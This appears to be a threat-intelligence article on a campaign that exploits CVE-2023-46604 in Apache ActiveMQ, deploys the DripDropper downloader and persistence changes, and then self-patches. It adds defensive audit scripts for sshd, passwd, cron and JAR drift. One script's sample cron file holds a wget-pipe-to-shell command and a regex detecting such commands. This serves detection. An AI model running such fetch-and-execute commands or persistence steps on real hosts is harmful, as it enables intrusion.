Red Canary’s Threat Intelligence team has uncovered a sophisticated adversarial campaign where attackers exploit CVE-2023-46604 in Apache ActiveMQ to gain persistent access on cloud Linux systems, then strategically patch the exploited vulnerability to secure their foothold and evade detection from competing threat actors.
Advanced Post-Exploitation Tactics
The campaign demonstrates counterintuitive behavior where adversaries “fix” compromised systems after gaining remote access.
This dual-purpose strategy effectively locks out competing adversaries while obscuring the initial access technique, showcasing advanced operational security considerations in modern cyber warfare.
Red Canary detected adversaries executing reconnaissance commands on dozens of cloud-based Linux endpoints vulnerable to the critical remote code execution vulnerability CVE-2023-46604 in Apache ActiveMQ.
This widely deployed open source message broker has previously been exploited to deploy the TellYouThePass, RansomHub, and HelloKitty ransomware variants, alongside Kinsing cryptomining malware.
DripDropper Technical Analysis
The adversaries deployed a varied command and control infrastructure, including Sliver implants and Cloudflare Tunnels for covert long-term access.
After exploiting endpoints and installing Sliver implants, the attackers modified the existing SSH daemon configuration to permit root login, which modern Linux distributions disable by default.
Under elevated SSH sessions, adversaries downloaded and executed a previously unknown downloader designated “DripDropper”.
This encrypted PyInstaller ELF file requires password authentication for execution, effectively hindering automated sandbox analysis.
DripDropper communicates with adversary-controlled Dropbox accounts using hardcoded bearer tokens, leveraging legitimate cloud platforms for command and control operations.
The malware establishes persistence by modifying anacron configuration files across the /etc/cron.*/ directories, altering SSH configuration files, and changing the login shell of the games user account to /bin/sh.
This modification prepares the system for additional persistent access through a seemingly innocuous user account.
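The three persistence changes described above (root login permitted in sshd_config, an interactive shell on a low-UID service account such as games, and tampered scripts under /etc/cron.*/) are each cheap to audit from configuration text alone. The following script is an added example, not code from Red Canary or from the report; the file contents it inspects are constructed samples, and on a live host they would be read from /etc/ssh/sshd_config, /etc/passwd, and the /etc/cron.*/ directories. One detail worth knowing when reading sshd_config: sshd honours the first occurrence of a keyword, so a directive appended at the end of the file does not override an earlier one, and the parser below reflects that.

```python
"""Audit Linux hosts for the persistence changes described above (added example)."""
import re
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Shells that give an account an interactive login; service accounts should not have one.
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/usr/bin/sh", "/usr/bin/bash"}
# Cron script heuristics: a download piped straight into a shell, or account/SSH tampering.
FETCH_PIPE_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
ACCOUNT_TAMPER_RE = re.compile(r"\b(chsh|usermod)\b|/etc/ssh/sshd_config|/etc/passwd")

# Constructed sample inputs (not taken from a real host).
SAMPLE_SSHD_CONFIG = """\
# constructed sshd_config excerpt
Port 22
PermitRootLogin yes
PasswordAuthentication yes
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
games:x:5:60:games:/usr/games:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
"""
SAMPLE_CRON_FILES = {
    "/etc/cron.daily/0anacron": "#!/bin/sh\ntest -x /usr/sbin/anacron || exit 0\n",
    "/etc/cron.hourly/sysupdate": "#!/bin/sh\nwget -qO- https://example.invalid/u.sh | sh\n",
}


def effective_sshd_option(config_text: str, keyword: str) -> Optional[str]:
    """Return the value sshd will actually use for `keyword` (first occurrence wins).

    Directives inside a Match block are conditional and are skipped here; None means
    the keyword is not set globally and sshd's compiled-in default applies.
    """
    in_match = False
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"(\S+?)[\s=]+(.*)", line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key.lower() == "match":
            in_match = True  # everything after a Match line is conditional
            continue
        if in_match:
            continue
        if key.lower() == keyword.lower():
            return value
    return None


def interactive_system_accounts(passwd_text: str, uid_max: int = 1000) -> List[Tuple[str, str]]:
    """Service accounts (UID below uid_max, root excluded) whose login shell is interactive."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, _, _, _, shell = fields
        if name != "root" and int(uid) < uid_max and shell in INTERACTIVE_SHELLS:
            hits.append((name, shell))
    return hits


def suspicious_cron_files(files: Dict[str, str]) -> List[str]:
    """Paths of cron.* scripts that fetch-and-execute or tamper with accounts/SSH."""
    return sorted(p for p, body in files.items()
                  if FETCH_PIPE_RE.search(body) or ACCOUNT_TAMPER_RE.search(body))


def audit(sshd_config: str, passwd: str, cron_files: Dict[str, str]) -> Dict[str, object]:
    """Combine the three checks into one findings dictionary."""
    # OpenSSH's default when PermitRootLogin is unset is prohibit-password.
    root_login = effective_sshd_option(sshd_config, "PermitRootLogin") or "prohibit-password"
    return {
        "root_password_login": root_login.lower() == "yes",
        "interactive_service_accounts": interactive_system_accounts(passwd),
        "suspicious_cron_files": suspicious_cron_files(cron_files),
    }


def collect_cron_files() -> Dict[str, str]:
    """Read every script under /etc/cron.*/ on a live host (used only when run directly)."""
    return {str(p): p.read_text(errors="replace")
            for d in Path("/etc").glob("cron.*") if d.is_dir() for p in d.iterdir() if p.is_file()}


if __name__ == "__main__":
    # Demonstrate on the constructed samples; swap in the live-host readers to audit a real system.
    print(audit(SAMPLE_SSHD_CONFIG, SAMPLE_PASSWD, SAMPLE_CRON_FILES))
```

Each finding maps to a line in the report: a `PermitRootLogin yes` that nobody in your change history set, a games account with /bin/sh, or a cron script that pulls code from the network. Running the audit from a central policy (Ansible, a CSPM agent, or a periodic cron job of your own) turns these one-off indicators into drift alerts.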
Vulnerability Patching Strategy
Following initial compromise, the adversaries downloaded legitimate ActiveMQ JAR files from Apache Maven repositories, which constitute the official fix for CVE-2023-46604.
By replacing the existing vulnerable JAR files, the attackers remediated the exploited vulnerability, reducing the chance that vulnerability scanners flag the host and preventing exploitation by competing threat actors.
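The defensive consequence of this self-patching is that a clean scanner result no longer proves a host was never exploited; a version change that your own change management did not perform is itself an indicator. The script below is an added example (not from the report or from Apache) that compares the JAR files present in an ActiveMQ lib directory against the versions recorded at deployment time and reports any drift, including unexpected upgrades. The file names and versions in the samples are constructed for illustration, and the lib directory path in `scan_dir` is an assumption about where a given install keeps its JARs.

```python
"""Detect ActiveMQ JAR version drift against a deployment baseline (added example)."""
import os
import re
from typing import Dict, List, Optional, Tuple

# Matches names like activemq-openwire-legacy-5.17.2.jar -> (artifact, version).
JAR_RE = re.compile(r"^(?P<artifact>[A-Za-z][\w.-]*?)-(?P<version>\d+(?:\.\d+)+)\.jar$")

# Constructed sample listings: what the deployment pipeline installed, and what is on disk now.
BASELINE_LISTING = [
    "activemq-broker-5.17.2.jar",
    "activemq-client-5.17.2.jar",
    "activemq-openwire-legacy-5.17.2.jar",
    "jolokia-core-1.7.1.jar",
]
OBSERVED_LISTING = [
    "activemq-broker-5.17.6.jar",
    "activemq-client-5.17.6.jar",
    "activemq-openwire-legacy-5.17.6.jar",
    "jolokia-core-1.7.1.jar",
]


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '5.17.6' into (5, 17, 6) so versions compare numerically, not lexically."""
    return tuple(int(part) for part in version.split("."))


def inventory(listing: List[str]) -> Dict[str, str]:
    """Map artifact name -> version for every versioned JAR in a directory listing."""
    inv: Dict[str, str] = {}
    for name in listing:
        m = JAR_RE.match(name)
        if m:
            inv[m.group("artifact")] = m.group("version")
    return inv


def jar_drift(baseline: Dict[str, str], observed: Dict[str, str]) -> List[Tuple[str, Optional[str], Optional[str], str]]:
    """Return (artifact, expected, actual, kind) for every artifact that differs from the baseline.

    kind is 'upgraded', 'downgraded', 'missing' or 'unexpected'. An 'upgraded' entry that
    no one in change management can account for is exactly the signal this campaign leaves.
    """
    drift = []
    for artifact, expected in sorted(baseline.items()):
        actual = observed.get(artifact)
        if actual == expected:
            continue
        if actual is None:
            kind = "missing"
        elif parse_version(actual) > parse_version(expected):
            kind = "upgraded"
        else:
            kind = "downgraded"
        drift.append((artifact, expected, actual, kind))
    for artifact in sorted(set(observed) - set(baseline)):
        drift.append((artifact, None, observed[artifact], "unexpected"))
    return drift


def scan_dir(path: str = "/opt/activemq/lib") -> Dict[str, str]:
    """Inventory a real lib directory (path is an assumption; adjust per install)."""
    return inventory(os.listdir(path))


if __name__ == "__main__":
    # On a live host: jar_drift(inventory(BASELINE_LISTING_FROM_CMDB), scan_dir())
    for entry in jar_drift(inventory(BASELINE_LISTING), inventory(OBSERVED_LISTING)):
        print(entry)
```

The baseline should come from the artifact you actually deployed (a CMDB record, the container image digest, or a lockfile checked in with the deployment), not from the host itself, because the host is what the adversary controls. Pair the drift report with shell history or process telemetry showing who fetched the JARs to separate an authorised upgrade from a foothold being sealed.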
| Component | Technical Details | 
|---|---|
| Vulnerability | CVE-2023-46604 (Apache ActiveMQ RCE) | 
| EPSS Score | 94.44% exploitation probability (30 days) | 
| Malware Type | Encrypted PyInstaller ELF | 
| C2 Infrastructure | Dropbox, Sliver, Cloudflare Tunnels | 
| Persistence Methods | SSH configuration modification, anacron scheduling | 
| Target Environment | Cloud-based Linux endpoints | 
Defensive Implications
This campaign underscores the sophistication of modern Linux-targeted operations, where adversaries implement multi-layered persistence mechanisms before self-remediating initial access vectors.
Organizations must implement policy-based SSH management, proactive vulnerability patching, network ingress controls, and comprehensive cloud logging to defend against such advanced persistent threats effectively.